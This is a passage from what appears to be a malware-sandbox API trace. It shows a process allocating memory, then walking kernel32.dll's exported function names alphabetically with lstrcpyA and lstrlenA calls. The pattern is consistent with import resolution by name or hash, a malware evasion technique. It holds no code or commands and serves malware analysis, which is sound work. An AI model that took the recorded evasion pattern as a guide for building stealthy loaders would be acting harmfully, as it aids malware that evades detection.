(lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.895] lstrlenA (lpString="kernel32.dll") returned 12 [0085.896] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.896] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.896] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.896] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.896] lstrlenA (lpString="ADDATOMA") returned 8 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.896] lstrlenA (lpString="ADDATOMW") returned 8 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.896] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.896] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.896] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.896] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.896] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.896] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.896] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.896] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.896] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.896] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.897] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.897] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.897] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.897] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.897] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.897] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.897] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.897] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.897] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.897] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.897] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.897] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.897] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.897] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.897] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.897] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.897] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.898] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.898] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.898] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.898] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.898] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.898] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.898] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.898] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.898] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.898] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.898] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.898] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.898] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.898] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.898] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.898] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.898] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.898] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.898] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.899] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.899] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.899] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.899] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.899] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.899] lstrlenA (lpString="BEEP") returned 4 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.899] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.899] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.899] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.899] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.899] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.899] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.899] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.899] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.899] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.899] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.899] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.899] lstrlenA (lpString="CANCELIO") returned 8 [0085.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.900] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.900] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.900] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.900] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.900] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.900] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.900] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.900] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.900] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.900] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.900] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.900] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.900] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.900] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.900] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.900] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.900] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.900] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.900] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.901] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.901] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.901] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.901] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.901] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.901] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.901] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.901] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.901] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.901] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.901] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.901] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.901] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.901] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.901] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.901] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.901] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.901] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.902] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.902] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.902] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.902] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.902] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.902] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.902] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.902] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.902] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.902] lstrlenA (lpString="COPYFILEA") returned 9 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.902] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.902] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.902] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.902] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.902] lstrlenA (lpString="COPYFILEW") returned 9 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.902] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.902] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.902] lstrlenA (lpString="CREATEACTCTXW") 